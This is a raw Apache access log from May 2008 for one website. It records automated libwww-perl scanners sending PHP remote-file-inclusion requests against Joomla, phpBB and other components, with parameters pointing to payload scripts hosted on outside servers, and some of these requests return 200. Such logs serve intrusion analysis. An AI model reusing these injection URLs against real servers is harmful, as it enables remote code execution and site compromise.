213.165.87.89 - - [01/May/2008:09:00:08 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.87.89 - - [01/May/2008:09:00:09 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.87.89 - - [01/May/2008:09:00:10 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:00:21 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:00:21 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:00:22 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:00:25 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:00:25 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://rpkns.com/media/idnews.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:00:25 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:00:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:00:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:00:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.32.94.50 - - [01/May/2008:09:00:45 -0700] "GET /logs/access_080205.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [01/May/2008:09:00:45 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [01/May/2008:09:00:45 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.16 - - [01/May/2008:09:00:51 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.86.181.227 - - [01/May/2008:09:01:04 -0700] "GET /logs/access_080210.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.4.3 - - [01/May/2008:09:01:06 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.4.3 - - [01/May/2008:09:01:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.193.229.20 - - [01/May/2008:09:01:07 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:01:10 -0700] "GET /logs/access_080126.log//components/com_forum/download.php?phpbb_root_path=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:01:10 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:01:10 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.26.209.233 - - [01/May/2008:09:01:16 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [01/May/2008:09:01:16 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [01/May/2008:09:01:16 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.87.89 - - [01/May/2008:09:01:21 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.85.232 - - [01/May/2008:09:01:56 -0700] "GET /logs/access_080117.log//components/com_forum/download.php?phpbb_root_path=http://www.perakan.net.my/modules/xoopsgallery/cache/di.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.67.23.140 - - [01/May/2008:09:01:56 -0700] "GET /logs/access_080218.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [01/May/2008:09:01:57 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [01/May/2008:09:01:57 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://163.19.174.121/cache/di.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:02:01 -0700] "GET /logs/access_080124.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.86.181.227 - - [01/May/2008:09:02:01 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [01/May/2008:09:02:02 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.86.181.227 - - [01/May/2008:09:02:02 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.4.3 - - [01/May/2008:09:02:04 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.63.9.163 - - [01/May/2008:09:02:06 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.teploobmen.ru/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.38.4.3 - - [01/May/2008:09:02:06 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [01/May/2008:09:02:06 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [01/May/2008:09:02:06 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:02:12 -0700] "GET /logs/access_080201.log//modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:02:12 -0700] "GET //modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:02:12 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [01/May/2008:09:02:15 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.27.8.25 - - [01/May/2008:09:02:24 -0700] "GET /module_db.php?pivot_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:02:28 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:02:28 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:02:28 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:02:28 -0700] "GET /logs/access_080321.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:02:33 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:02:33 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:02:33 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.27.8.25 - - [01/May/2008:09:02:34 -0700] "GET /logs/module_db.php?pivot_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:02:40 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:02:41 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:02:41 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.27.8.25 - - [01/May/2008:09:02:48 -0700] "GET /logs/access_071231.log/module_db.php?pivot_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:02:48 -0700] "GET /logs/access_080205.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:02:48 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:02:49 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.92 - - [01/May/2008:09:02:51 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.92 - - [01/May/2008:09:02:51 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.92 - - [01/May/2008:09:02:52 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.94.221.218 - - [01/May/2008:09:02:59 -0700] "GET /logs/access_080302.log/index.php?pageurl=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.94.221.218 - - [01/May/2008:09:03:01 -0700] "GET /logs/index.php?pageurl=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.184.243.31 - - [01/May/2008:09:03:01 -0700] "GET /logs/access_080215.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.184.243.31 - - [01/May/2008:09:03:01 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.184.243.31 - - [01/May/2008:09:03:02 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
68.165.216.146 - - [01/May/2008:09:03:03 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.165.216.146 - - [01/May/2008:09:03:03 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.56.178 - - [01/May/2008:09:03:29 -0700] "GET /logs/access_071225.log/admin.php?cal_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [01/May/2008:09:03:29 -0700] "GET /admin.php?cal_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [01/May/2008:09:03:29 -0700] "GET /logs/admin.php?cal_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.26.209.233 - - [01/May/2008:09:03:35 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:03:37 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:03:38 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:03:38 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:03:53 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:03:53 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.4.3 - - [01/May/2008:09:04:04 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.251.123 - - [01/May/2008:09:04:12 -0700] "GET /logs/index.php?dir_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.214.163 - - [01/May/2008:09:04:13 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
96.52.36.19 - - [01/May/2008:09:04:14 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.251.123 - - [01/May/2008:09:04:16 -0700] "GET /index.php?dir_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
96.52.36.19 - - [01/May/2008:09:04:17 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.205.214.163 - - [01/May/2008:09:04:19 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.214.163 - - [01/May/2008:09:04:20 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.32.94.50 - - [01/May/2008:09:04:20 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [01/May/2008:09:04:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [01/May/2008:09:04:20 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [01/May/2008:09:04:44 -0700] "GET /logs/access_080210.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:04:53 -0700] "GET /logs/access_080210.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.94.221.218 - - [01/May/2008:09:04:54 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.94.221.218 - - [01/May/2008:09:04:54 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.94.221.218 - - [01/May/2008:09:04:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.94.221.218 - - [01/May/2008:09:04:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:05:09 -0700] "GET /logs/access_080210.log//components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:05:09 -0700] "GET /logs/access_080210.log//components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:05:10 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:05:10 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:05:10 -0700] "GET /logs/access_080210.log//components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:05:10 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:05:10 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:05:10 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:05:11 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.153.103.135 - - [01/May/2008:09:05:15 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
202.153.103.135 - - [01/May/2008:09:05:15 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:05:22 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.251.123 - - [01/May/2008:09:05:27 -0700] "GET /logs/access_080131.log/index.php?dir_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.103.23.40 - - [01/May/2008:09:05:37 -0700] "GET /logs/access_080308.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.tenis-prerov.cz/albums/Kanar07/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [01/May/2008:09:05:38 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.tenis-prerov.cz/albums/Kanar07/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [01/May/2008:09:05:38 -0700] "GET /logs/access_080122.log/index.php?dir_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:05:38 -0700] "GET /logs/access_080321.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:05:46 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
